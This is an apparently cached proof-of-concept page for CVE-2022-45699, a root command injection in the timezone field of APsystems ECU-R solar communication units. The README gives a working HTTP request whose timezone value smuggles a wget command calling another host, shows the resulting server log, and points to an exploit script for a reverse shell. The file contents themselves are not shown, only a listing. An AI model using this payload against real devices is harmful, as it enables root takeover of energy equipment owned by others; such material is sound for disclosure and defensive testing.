CVE-2022-45699 PoC — APsystems Energy Communication Unit 操作系统命令注入漏洞

Source

https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone

Associated Vulnerability

Title:APsystems Energy Communication Unit 操作系统命令注入漏洞 (CVE-2022-45699)
Description:APsystems Energy Communication Unit（APsystems ECU-R）是美国APsystems公司的一个能量通信单元。 APSystems ECU-R 5203版本存在操作系统命令注入漏洞。攻击者利用该漏洞使用timezone参数以root身份执行任意命令。

Description

 CVE-2022-45699 - APSystems ECU-R is vulnerable to command injection in the timezone field

Readme

# APSystems-DS3-RCE-Timezone
APSystems DS3 is vulnerable to command injection in the timezone field

![demo](demo.png)

```
POST /index.php/management/set_timezone HTTP/1.1
Host: 192.168.1.99

timezone=;wget+192.168.1.87;#
```


```
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.1.99 - - [11/Nov/2022 14:28:04] "GET / HTTP/1.1" 200 
```

See `exploit.py` for an exploit to obtain a reverse shell

File Snapshot


 [4.0K]  /data/pocs/0dc27eea7c7e488442811c9783b6806de6613a1f
├── [ 64K]  demo.png
├── [1.1K]  exploit.py
├── [ 443]  README.md
└── [ 662]  revert_timestamp.py

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!